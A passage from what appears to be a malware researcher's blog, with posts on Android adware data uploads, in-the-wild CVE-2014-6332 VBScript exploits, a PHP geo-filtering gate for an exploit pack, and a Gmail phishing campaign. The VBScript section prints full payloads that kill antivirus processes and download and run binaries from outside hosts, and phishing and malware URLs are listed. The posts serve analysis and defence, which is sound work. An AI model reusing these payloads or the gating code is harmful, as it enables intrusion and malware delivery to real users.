"v_campaign": "yd447a9ysnrwv44b2m8p97au545hqbpnqrqv",
"subid": "dAF08D9FUE813PVJ0PNAMH6O",
"shortcut": "aa.aff",
"ipcc": "us",
"iprc": "ca",
"xsid": "FyY0MUJgP0-AitmpO62mVw",
"ccconfigid": "a29869e5.140812"
}
Read/Write Operations are shown below:
write /data/data/com.armorforandroid.security/shared_prefs/APP_PREFS_LOCKED.xml
read /data/data/com.android.music/shared_prefs/Music.xml
write /data/data/com.armorforandroid.security/shared_prefs/APP_PREFS_LOCKED.xml
write /data/data/com.armorforandroid.security/shared_prefs/APP_PREFS_LOCKED.xml
read /data/data/com.android.browser/shared_prefs/com.android.browser_preferences.xml
read /data/data/com.android.mms/shared_prefs/_has_set_default_values.xml
read /data/data/com.android.mms/shared_prefs/com.android.mms_preferences.xml
The device ID is submitted as follows:
POST /api/submit?deviceId=d3rqs2c37m&version=349 HTTP/1.1
Content-Type: application/json; charset=utf-8
User-Agent: Dalvik/1.4.0 (Linux; U; Android 2.3.4; generic Build/GRJ22)
Host: url.armorforandroid.net
Connection: Keep-Alive
Content-Length: 641
Accept-Encoding: gzip
Data Exfiltration:
POST /innilytics/upload/01c0994d555ea19e1ef7e0e5b69c9dab HTTP/1.1
Content-Type: application/x-gzip
Content-Length: 1558
Host: innilytics.cloudapp.net
Connection: Keep-Alive
User-Agent: Apache-HttpClient/UNAVAILABLE (java 1.4)
[gzip-compressed request body, 1558 bytes; binary content not reproduced]
HTTP/1.1 200 OK
Cache-Control: private
Server: Microsoft-IIS/7.5
X-AspNetMvc-Version: 3.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Mon, 04 May 2015 01:36:51 GMT
Content-Length: 0
VirusTotal report: https://www.virustotal.com/en/file/af518ec81e4ddb7b08048b7924c7f63e55c654a702f5c62ebf3e83d39c51bab2/analysis/1430705447/
At the time of this post, the link is still active: hxxp://www.cellphoneupdated.com/fatalvirus/us/106/index.php?countryname=United%20States&model=Galaxy%20Nexus&brand=Samsung&isp=Nobis%20Technology%20Group%2C%20LLC&voluumdata=vid..00000003-87e9-496c-8000-000000000000__vpid..5226a000-bf41-11e4-8376-93ef5ad96b35__caid..a88aabcb-264f-46ba-9801-a85f36f00867__lid..1b71b07a-7436-46e5-981f-f6273dfbcbb5__rt..DJ__oid1..4e28fd07-1e86-4ea9-9d0e-bdcfc0d9ffd1__var1..U
Beware of these kinds of applications!
Saturday, March 14, 2015
A Real World Story of CVE-2014-6332: RCE and Malware Download via VBScript!
Recently, we have observed in our analysis that exploit code for CVE-2014-6332 is either embedded directly in the web pages of an infected website or used as a component of Browser Exploit Packs (BEPs) to download malware and execute commands remotely.
Earlier, we discussed how Chinese domains served near-identical exploits taken from Metasploit (http://secniche.blogspot.com/2013/03/malware-retrospective-infected-chinese.html) to trigger infections. However, attackers tweak the structure of the exploits as needed in order to conduct successful infections on the fly through compromised websites.
Let's discuss the vulnerability in question. The public CVE description reads: "CVE-2014-6332: OleAut32.dll in OLE in Microsoft Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8, Windows 8.1, Windows Server 2012 Gold and R2, and Windows RT Gold and 8.1 allows remote attackers to execute arbitrary code via a crafted web site, as demonstrated by an array-redimensioning attempt that triggers improper handling of a size value in the SafeArrayDimen function, aka 'Windows OLE Automation Array Remote Code Execution Vulnerability.'"
Refer to the Metasploit module (http://downloads.securityfocus.com/vulnerabilities/exploits/70952.rb) and the Microsoft advisory on the subject (https://technet.microsoft.com/en-us/library/security/ms14-064.aspx).
Trend Micro has already discussed this vulnerability in some detail (http://blog.trendmicro.com/trendlabs-security-intelligence/a-killer-combo-critical-vulnerability-and-godmode-exploitation-on-cve-2014-6332/), so we do not want to repeat that discussion here.
Two VBScript variants have been found in use with this vulnerability; both are discussed below. The primary structure of the exploit remains the same, but the payload depends entirely on the VBScript code embedded in the web pages or BEPs.
As you can see, "cmd.exe" is triggered with the options "/q /c", which make Windows execute the command without echoing any output, so the commands run without any notification in the Windows GUI (the trailing 0 passed to shell.run additionally hides the command window). Other insights:
The Norton "360.exe" process is killed, and several other commands are executed.
<script language="VBScript">
function runmumaa()
On Error Resume Next
set shell=createobject("wscript.shell")
' Every command runs through cmd.exe /q /c with window style 0, so nothing is shown to the user.
shell.run "cmd.exe /q /c net user admin /del",0
shell.run "cmd.exe /q /c sc stop sharedaccess",0
shell.run "cmd.exe /q /c md C:\RECYCLER",0
' Terminate the 360*.exe processes and earlier copies of the payload's own components.
shell.run "cmd.exe /q /c taskkill /f /im 360rp.exe",0
shell.run "cmd.exe /q /c taskkill /f /im 360sd.exe",0
shell.run "cmd.exe /q /c taskkill /f /im 360tray.exe",0
shell.run "cmd.exe /q /c taskkill /f /im arp2.exe",0
shell.run "cmd.exe /q /c taskkill /f /im 360.exe",0
shell.run "cmd.exe /q /c taskkill /f /im 361.exe",0
shell.run "cmd.exe /q /c ping 127.0.0.1 -n 200&taskkill /f /im fp.exe&taskkill /f /im ftp.exe&taskkill /f /im arp1.exe&taskkill /f /im arp2.exe&taskkill /f /im fa1.exe&taskkill /f /im fa2.exe&taskkill /f /im fa.exe",0
' The path below is the Chinese-language Startup folder: 「开始」菜单\程序\启动 = Start Menu\Programs\Startup.
shell.run "cmd.exe /q /c del C:\docume~1\alluse~1\「开始」菜单\程序\启动\360.exe",0
shell.run "cmd.exe /q /c del C:\docume~1\alluse~1\「开始」菜单\程序\启动\361.exe",0
shell.run "cmd.exe /q /c del C:\RECYCLER\360.exe",0
shell.run "cmd.exe /q /c del C:\RECYCLER\361.exe",0
' ftp.exe is copied to fp.exe and driven with a scripted session file (fp.dw) to fetch and start the second stage.
shell.run "cmd.exe /q /c copy c:\windows\system32\ftp.exe C:\RECYCLER\fp.exe",0
shell.run "cmd.exe /q /c copy c:\windows\system32\ftp.exe c:\windows\system32\fp.exe",0
shell.run "cmd.exe /q /c copy %systemroot%\system32\ftp.exe %systemroot%\system32\fp.exe",0
shell.run "cmd.exe /q /c echo open 104.152.215.90>C:\RECYCLER\fp.dw&echo do1>>C:\RECYCLER\fp.dw&echo 123456>>C:\RECYCLER\fp.dw&echo bin >>C:\RECYCLER\fp.dw&echo get a1.exe C:\RECYCLER\a1.exe>>C:\RECYCLER\fp.dw&echo get arp2.exe C:\RECYCLER\arp2.exe>>C:\RECYCLER\fp.dw&echo get fa2.exe C:\RECYCLER\fa2.exe>>C:\RECYCLER\fp.dw&echo get cgud.exe C:\RECYCLER\cgud.exe>>C:\RECYCLER\fp.dw&echo bye >>C:\RECYCLER\fp.dw&ping 127.0.0.1 -n 10&FP -s:C:\RECYCLER\fp.dw&del C:\RECYCLER\fp.dw /q&copy C:\RECYCLER\fa2.exe C:\docume~1\alluse~1\「开始」菜单\程序\启动\fa2.exe&copy C:\RECYCLER\arp2.exe C:\docume~1\alluse~1\「开始」菜单\程序\启动\arp2.exe&start C:\RECYCLER\fa2.exe&start C:\RECYCLER\a1.exe&start C:\RECYCLER\cgud.exe&C:\RECYCLER\arp2.exe&del C:\RECYCLER\fp.exe",0
end function
</script>
Another variant of the exploit payload is shown below. It highlights exactly how HTTP requests are issued using AJAX (MSXML2.XMLHTTP) to download the malware directly (http://natmasla.ru/ath/sploit/natmasla.exe; this link might still be active). VBScript calls are then used to execute the malware.
<script language="VBScript">
function runmumaa()
On Error Resume Next
set shell=createobject("Shell.Application")
' A single cmd.exe command line writes a downloader (wUnlRLZR.vbs) into %TEMP% with echo, runs it via cscript.exe and deletes it.
shell.ShellExecute "cmd.exe", "/c CD %TEMP%&
@echo Set objXMLHTTP=CreateObject(""MSXML2.XMLHTTP"")>wUnlRLZR.vbs&
@echo objXMLHTTP.open ""GET"",""http://natmasla.ru/ath/sploit/natmasla.exe"",false>>wUnlRLZR.vbs&
@echo objXMLHTTP.send()>>wUnlRLZR.vbs&
@echo If objXMLHTTP.Status=200 Then>>wUnlRLZR.vbs&
@echo Set objADOStream=CreateObject(""ADODB.Stream"")>>wUnlRLZR.vbs&
@echo objADOStream.Open>>wUnlRLZR.vbs&
@echo objADOStream.Type=1 >>wUnlRLZR.vbs&
@echo objADOStream.Write objXMLHTTP.ResponseBody>>wUnlRLZR.vbs&
@echo objADOStream.Position=0 >>wUnlRLZR.vbs&
@echo objADOStream.SaveToFile ""%TEMP%\natmasla.exe"">>wUnlRLZR.vbs&
@echo objADOStream.Close>>wUnlRLZR.vbs&
@echo Set objADOStream=Nothing>>wUnlRLZR.vbs&
@echo End if>>wUnlRLZR.vbs&
@echo Set objXMLHTTP=Nothing>>wUnlRLZR.vbs&
@echo Set objShell=CreateObject(""WScript.Shell"")>>wUnlRLZR.vbs&
@echo objShell.Exec(""%TEMP%\natmasla.exe"")>>wUnlRLZR.vbs&cscript.exe %TEMP%\wUnlRLZR.vbs&del %TEMP%\wUnlRLZR.vbs", "", "open", 0
end function
</script>
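As an added example (not code from the original post), the following Python detector pulls VBScript blocks out of a page and looks for the two indicator chains seen in the payloads above: hidden cmd.exe execution through a shell object, and the MSXML2.XMLHTTP / ADODB.Stream / Exec download-and-execute sequence staged with echo. The indicator names, the three sample pages and the malware.example URL are constructed for the example.

```python
import re

# Indicator regexes for the two payload shapes shown above. VBScript is
# case-insensitive, so every pattern is compiled with re.I.
INDICATORS = {
    "shell_object": re.compile(
        r'CreateObject\(\s*"{1,2}(WScript\.Shell|Shell\.Application)"{1,2}\s*\)', re.I),
    "hidden_cmd": re.compile(r'cmd\.exe\s+/q\s+/c|ShellExecute\s+"cmd\.exe"', re.I),
    "http_fetch": re.compile(r'"{1,2}MSXML2\.XMLHTTP"{1,2}', re.I),
    "stream_to_disk": re.compile(r'ADODB\.Stream.*?SaveToFile', re.I | re.S),
    "exec_dropped": re.compile(r'\.(Exec|Run)\s*\(?\s*"{1,2}%TEMP%\\', re.I),
    "av_kill": re.compile(r'taskkill\s+/f\s+/im\s+\S+', re.I),
    "echo_dropper": re.compile(r'@echo\s.*?>>?\s*\S+\.vbs', re.I),
    "error_suppression": re.compile(r'On\s+Error\s+Resume\s+Next', re.I),
}

# Indicator sets that, seen together, describe each variant on the page.
CHAINS = {
    "cmd_execution": {"shell_object", "hidden_cmd"},                           # variant 1
    "download_and_execute": {"http_fetch", "stream_to_disk", "exec_dropped"},  # variant 2
    "echo_dropper": {"hidden_cmd", "echo_dropper"},                            # variant 2 staging
}

SCRIPT_RE = re.compile(
    r'<script[^>]*language\s*=\s*"?vbscript"?[^>]*>(.*?)</script>', re.I | re.S)

def extract_vbscript(html):
    """Return the bodies of all VBScript <script> blocks in a page."""
    return [m.group(1) for m in SCRIPT_RE.finditer(html)]

def analyse(html):
    """Return (indicator names hit, chains completed) for the page's VBScript."""
    body = "\n".join(extract_vbscript(html))
    hits = {name for name, rx in INDICATORS.items() if rx.search(body)}
    chains = sorted(name for name, needed in CHAINS.items() if needed <= hits)
    return hits, chains

def verdict(html):
    """A completed chain is malicious; isolated indicators only raise suspicion."""
    hits, chains = analyse(html)
    if chains:
        return "malicious"
    return "suspicious" if len(hits) >= 2 else "clean"

# Constructed pages modelled on the two variants (not the captured payloads;
# file names and the malware.example URL are placeholders).
SAMPLE_CMD_VARIANT = r"""<script language="VBScript">
function runmumaa()
On Error Resume Next
set shell=createobject("wscript.shell")
shell.run "cmd.exe /q /c taskkill /f /im avproc.exe",0
shell.run "cmd.exe /q /c del C:\RECYCLER\dropper.exe",0
end function
</script>"""
SAMPLE_DROPPER_VARIANT = r"""<script language="VBScript">
function runmumaa()
On Error Resume Next
set shell=createobject("Shell.Application")
shell.ShellExecute "cmd.exe", "/c CD %TEMP%&@echo Set x=CreateObject(""MSXML2.XMLHTTP"")>d.vbs&@echo x.open ""GET"",""http://malware.example/p.exe"",false>>d.vbs&@echo x.send()>>d.vbs&@echo Set s=CreateObject(""ADODB.Stream"")>>d.vbs&@echo s.Write x.ResponseBody>>d.vbs&@echo s.SaveToFile ""%TEMP%\p.exe"">>d.vbs&@echo Set w=CreateObject(""WScript.Shell"")>>d.vbs&@echo w.Exec(""%TEMP%\p.exe"")>>d.vbs&cscript.exe %TEMP%\d.vbs", "", "open", 0
end function
</script>"""
# Benign VBScript that also uses MSXML2.XMLHTTP: a single indicator, no chain.
SAMPLE_BENIGN = """<script language="VBScript">
Sub LoadNews()
  Set req = CreateObject("MSXML2.XMLHTTP")
  req.open "GET", "/news.xml", False
  req.send
End Sub
</script>"""
```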
Publicly available exploits can be tweaked easily, as the case study above shows. It is really interesting to analyze the types of payloads and exploits used in the wild to exploit vulnerabilities in browsers.
Inference: openly available exploits are restructured by attackers and used in BEPs to trigger infections.
Labels: Browser Exploit Pack, CVE-2014-6332, Cybercrime, Malware
Sunday, February 22, 2015
A Case Study of Geo-location Filtering and Dedicated Malware Infections!
It is a widely known fact that the majority of infectious code (iframes redirecting to browser exploit packs) is hosted on free domains or on compromised websites that are sold in the underground community. In my earlier presentation at the Virus Bulletin Conference (HERE), I discussed the IP Address Logging Detection Trick (IPLDT), which allows attackers to restrict the spread of malware to a dedicated audience on the Internet. For more about BEPs, read the previous research papers:
- Styx Exploit Pack - http://secniche.org/released/VB_Styx_Exploit_Pack.pdf
- Sweet Orange Exploit Pack - http://secniche.org/released/VB_SWEET_ORANGE_EXP_AKS_RB_RJE.pdf
A simple workflow is discussed below:
- The user visits the website serving infectious code.
- The infected website triggers the custom code hosted by the attacker to check the following:
- Geo-location of the IP address: if the geo-location of the end-user's IP address maps to one of the locations listed in the configuration file, the user's browser is redirected to the BEP for exploitation.
- Whether the exploit code has already been served to this IP: if the database shows that the IP has been served already, the end-user's IP address is filtered and the BEP URL is not served.
- When the user's browser lands on the BEP URL, a specific vulnerability in the browser (built-in components or plug-ins) is exploited to download malware.
In addition, filters are added for various automated spiders to restrict access by bots and to prevent the malicious website or its links from appearing in search results. Recently, I was analyzing a malicious website that served infectious code and redirected the user's browser to a BEP, which downloaded malware by exploiting a specific vulnerability. However, the name of the exploit kit is not known. This analysis concentrates on the compromised website that performs the redirection of the user's browser to the BEP.
A code snippet extracted from the infected website is presented below. It clearly shows that the user-agent and the IP geo-location ("CH" = Switzerland, "DE" = Germany) are used as filters on the incoming HTTP traffic. Additionally, two files are generated as databases of the IP addresses that were either successful (sbase.txt) or unsuccessful (sbase_bad.txt) in getting the direct link to the BEP URL from the infected website.
<?php
error_reporting(0); ini_set('display_errors',0);
// Both lists are read as one regular expression per line (see the banned user-agent list below).
function is_bot($myuagent, $myip) {
    $uagents = file('uagents.txt',FILE_IGNORE_NEW_LINES);
    $ips = file('ips.txt',FILE_IGNORE_NEW_LINES);
    foreach ($uagents as $exp) {
        if (preg_match('/'.$exp.'/i',$myuagent)) {
            return true;
        }
    }
    foreach ($ips as $exp) {
        if (preg_match('/'.$exp.'/',$myip)) {
            return true;
        }
    }
    return false;
}
$countries = "CH;DE";
// page with the exploit (Russian comment in the original, recovered from mis-encoded text)
$good_link = "./banner.php";
// decoy page (Russian comment in the original, recovered from mis-encoded text)
$bad_link = "./blabla.php";
$ip = $_SERVER['REMOTE_ADDR'];
$ua = $_SERVER['HTTP_USER_AGENT'];
$file = fopen("./sbase.txt","a+");      // IPs that have already been sent to the BEP
$file2 = fopen("./sbase_bad.txt","a+"); // visitors that failed the country/browser check
$already_showed = FALSE;
// One-visit-per-IP check (IPLDT): scan sbase.txt for the visitor's address.
while (!feof($file)) {
    $buffer = fgets($file);
    $ip2 = $ip."\r\n";
    if(strcmp($buffer,$ip2)==0) $already_showed = TRUE;
}
// Note: the bot check reads a request parameter, not the User-Agent header stored in $ua.
if (is_bot($_REQUEST['useragent'], $ip)) $already_showed = TRUE;
if($already_showed) {
    include($bad_link);
} else {
    require_once('./geoip/geoip.inc');
    $gi = geoip_open("./geoip/GeoIP.dat",GEOIP_STANDARD);
    $ccode = explode(";",$countries);
    $show = FALSE;
    foreach($ccode as $value) {
        // Serve the BEP link only to CH/DE visitors whose user-agent claims MSIE, Opera or Firefox.
        if(geoip_country_code_by_addr($gi,$ip) == $value && preg_match('/(msie|opera|firef)/i', $ua)) {
            $show = TRUE;
            fwrite($file,$ip."\r\n");
        }
    }
    geoip_close($gi);
    if($show) {
        include($good_link);
    } else {
        fwrite($file2,$ip."|".$ua."\r\n");
        include($bad_link);
    }
}
fclose($file);
?>
On checking the two files, the following stats were gathered:
- Approximately 5881 unique IP addresses (users' browsers) were successfully redirected to the BEP.
- Approximately 15737 unique IP addresses (users' browsers) were prevented from reaching the BEP.
The list of banned user-agent patterns is shown below:
Ask\s*Jeeves
HP\s*Web\s*PrintSmart
HTTrack
IDBot
Indy\s*Library#
ListChecker
MSIECrawler
NetCache
Nutch
RPT-HTTPClient
rulinki\.ru
Twiceler
WebAlta
Webster\s*Pro
www\.cys\.ru
Wysigot
Yahoo!\s*Slurp
Yeti
Accoona
CazoodleBot
CFNetwork
ConveraCrawlerDISCo
Download\s*Master
FAST\s*MetaWeb\s*Crawler
Flexum\s*spider
Gigabot
HTMLParser
ia_archiver
ichiro
IRLbot
Java
km\.ru\s*bot
kmSearchBot
libwww-perl
Lupa\.ru
LWP::Simple
lwp-trivial
Missigua
MJ12bot
msnbot
msnbot-media
Offline\s*Explorer
OmniExplorer_Bot
PEAR
psbot
Python
rulinki\.ru
SMILE
Speedy
Teleport\s*Pro
TurtleScanner
User-Agent
voyager
Webalta
WebCopier
WebData
WebZIP
Wget
Yandex
Yanga
Yeti
msnbot
spider
yahoo
jeeves
google
altavista
scooter
av\s*fetch
asterias
spiderthread revision
sqworm
ask
lycos.spider
infoseek sidewinder
ultraseek
polybot
webcrawler
robozill
gulliver
architextspider
yahoo!\s*slurp
charlotte
ngb
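As an added example (not code from the original post or from the infected site), here is a Python re-implementation of the gate's decision logic from the PHP above, together with an analyst's reader for the sbase_bad.txt records, so the reasons behind a served/refused split like the 5881/15737 above can be reconstructed from the two files. The user-agent patterns and log records are constructed (RFC 5737 test addresses), and the reason labels are my own.

```python
import re
from collections import Counter

# The gate only forwards user agents claiming MSIE, Opera or Firefox (from the PHP above).
BROWSER_RE = re.compile(r"(msie|opera|firef)", re.I)
TARGET_COUNTRIES = ("CH", "DE")

# Constructed excerpt of uagents.txt: one PCRE per line, matched case-insensitively like is_bot().
UAGENTS_TXT = r"""Yahoo!\s*Slurp
Python
Wget
libwww-perl
Java
spider
"""

# Constructed sbase_bad.txt content in the gate's "ip|user-agent" CRLF format.
SBASE_BAD_TXT = "\r\n".join([
    "192.0.2.10|Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36",
    "192.0.2.10|Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36",
    "198.51.100.7|python-requests/2.5.1 CPython/2.7.9 Linux/3.16.0",
    "198.51.100.8|Wget/1.16 (linux-gnu)",
    "203.0.113.3|Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko",
    "203.0.113.9|Opera/9.80 (Windows NT 5.1) Presto/2.12.388 Version/12.16",
]) + "\r\n"

def load_patterns(text):
    """Compile uagents.txt lines the way is_bot() uses them: /<line>/i."""
    return [re.compile(line, re.I) for line in text.splitlines() if line.strip()]

def matching_pattern(ua, patterns):
    """Return the source of the first banned pattern matching ua, or None."""
    for rx in patterns:
        if rx.search(ua):
            return rx.pattern
    return None

def parse_sbase_bad(text):
    """Parse "ip|ua" records; a UA may itself contain '|', so split only once."""
    records = []
    for line in text.split("\r\n"):
        if "|" in line:
            ip, ua = line.split("|", 1)
            records.append((ip, ua))
    return records

def gate_decision(country, ua, already_served, is_bot, countries=TARGET_COUNTRIES):
    """Mirror the PHP decision: which page does this visitor receive?"""
    if already_served or is_bot:
        return "decoy"
    if country in countries and BROWSER_RE.search(ua):
        return "bep"
    return "decoy"

def summarise(bad_text, patterns):
    """Explain why each sbase_bad.txt visitor was turned away and count unique IPs."""
    records = parse_sbase_bad(bad_text)
    reasons = Counter()
    for _, ua in records:
        if matching_pattern(ua, patterns):
            # Tool UA that got past is_bot(), which checks a request parameter, not the header.
            reasons["tool_ua"] += 1
        elif not BROWSER_RE.search(ua):
            # e.g. Chrome, or IE11, whose "Trident/7.0 ... like Gecko" UA carries no "MSIE" token.
            reasons["browser_not_targeted"] += 1
        else:
            reasons["geo_rejected"] += 1  # right browser family, visitor outside CH/DE
    return {"records": len(records),
            "unique_ips": len({ip for ip, _ in records}),
            "reasons": dict(reasons)}
```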
Inference: BEPs extensively use IPLDT to manage infections and to ensure the malicious code is served only to dedicated countries.
Sunday, February 8, 2015
Virus Bulletin Paper - Prosecting the Citadel botnet!
Virus Bulletin earlier published our research on Citadel. Check the links:
Full PDF paper : https://www.virusbtn.com/pdf/magazine/2014/vb201409-Citadel.pdf
- Prosecting the Citadel botnet - revealing the dominance of the Zeus descendent: part one: https://www.virusbtn.com/virusbulletin/archive/2014/09/vb201409-Citadel-1
- Prosecting the Citadel botnet - revealing the dominance of the Zeus descendent: part two: https://www.virusbtn.com/virusbulletin/archive/2014/09/vb201409-Citadel-2
Sunday, August 24, 2014
Tuesday, April 15, 2014
Targeted Cyber Attacks Book - Syngress!
Update: A very insightful review of the book was published in Network Security.
I started sketching this book about a year ago, when I was invited by Syngress to take on this project based on my previous work on crimeware research. Thanks to the Syngress and Elsevier team for this step. Due to my ongoing job and commitments the project got delayed, but eventually the book is about to be published on 18th April. The first edition of the book is dedicated to readers who are interested in understanding the artifacts of targeted cyber-attacks and their associated components. Personally, I would like to thank all the researchers and journalists who reviewed the book and provided positive feedback.
Introduction: Cyber-crime increasingly impacts both the online and offline world, and targeted attacks play a significant role in disrupting services in both. Targeted attacks are those that are aimed at a particular individual, group, or type of site or service. Unlike worms and viruses, which usually attack indiscriminately, targeted attacks involve intelligence gathering and planning to a degree that drastically changes their profile.
Individuals, corporations, and even governments are facing new threats from targeted attacks. Targeted Cyber Attacks examines real-world examples of directed attacks and provides insight into the techniques and resources used to stage these attacks, so that you can counter them more effectively.
The book can be ordered at the following places:
- Amazon: http://www.amazon.com/Targeted-Cyber-Attacks-Multi-staged-Exploits/dp/0128006048
- Kindle Edition: http://www.amazon.com/Targeted-Cyber-Attacks-Multi-staged-Exploits-ebook/dp/B00JRVB3UY
- Elsevier: http://store.elsevier.com/Targeted-Cyber-Attacks/Aditya-Sood/isbn-9780128006047/
- Barnes and Noble: http://www.barnesandnoble.com/w/targeted-cyber-attacks-aditya-sood/1118602703?ean=9780128006047
Enjoy!
Thursday, February 27, 2014
Gmail Phishing Attack - Why Do the Anti-spam Solutions Fail to Trigger?
Update: 5th March, 2014
Note: I am concerned because it got delivered to my personal Gmail inbox :-)
It looks like the phishing attack against Gmail users discussed earlier (a week ago) is still underway. Although the attack is public now, the endpoint security solutions deployed by Google still fail to mark the emails as phishing. The latest snapshot of this attack is presented below:
Links:
- hxxp://croydon.com.br/phpthumb/serv/serv/Login.htm
- hxxp://croydon.com.br/phpthumb/serv/serv/badu.php
The host has a history of malicious activity, though: https://www.virustotal.com/en/ip-address/187.17.98.129/information/
Depending heavily on Safe Browsing to blacklist phishing websites is not reliable; prevention has to be triggered at the point of origin. Let's see how long this continues.
-------------------------------
A recent targeted phishing attack has been launched against gmail.com users. Interestingly, the email slipped through Google's endpoint security solution, which failed to detect the spam email and delivered it straight to the user's inbox.
Visiting the link results in the following web page, which has the same layout as Gmail.
Malicious Check:
- The domain resolves to an IP address with a history of potentially malicious activity: https://www.virustotal.com/en/ip-address/79.170.44.127/information/. The virtual hosting server has been used for compromised WordPress websites.
Overall, the basic steps:
- The user is redirected to and served a gmail.com look-alike web page here: hxxp://www.nusurgix.com/virtusite/phpthumb/serv/Login.htm
- The form submission sends all the POST data to: hxxp://www.nusurgix.com/virtusite/phpthumb/serv/badu.php
- The user is then redirected to the legitimate gmail.com web page: hxxps://accounts.google.com/
The website is hosted on a CMS hosting server, as shown below:
Overall, it might not be that sophisticated an attack, but a few inferences:
- A smart user would have detected that this is a trick even though it was delivered to the inbox.
- The big issue: the anti-spam solutions in Google's network fail to detect it and mark it as phishing.
- A few users may have fallen for this trick, but we cannot be sure.
- The attacker used compromised network infrastructure to execute this attack; a healthcare provider's hosting account was compromised.
- Even if this type of attack remains active for only a few minutes, it could already have garnered a good set of accounts.
Do not fall for this trap!
Sunday, January 12, 2014
Virus Bulletin - NiFramer Iframer Injector - CPanel
A couple of months ago, we released a paper on the design of NiFramer, a bash tool that automates iframe injection on compromised servers. It has been used widely by attackers. In the coming time, we will be covering different variants of automated iframe injection tools.
You can download the paper at: http://secniche.org/released/VB_CPANEL_IFRAME_INJECT.pdf
Labels: CPanel Infection, Iframe injector, Malware, Server Infections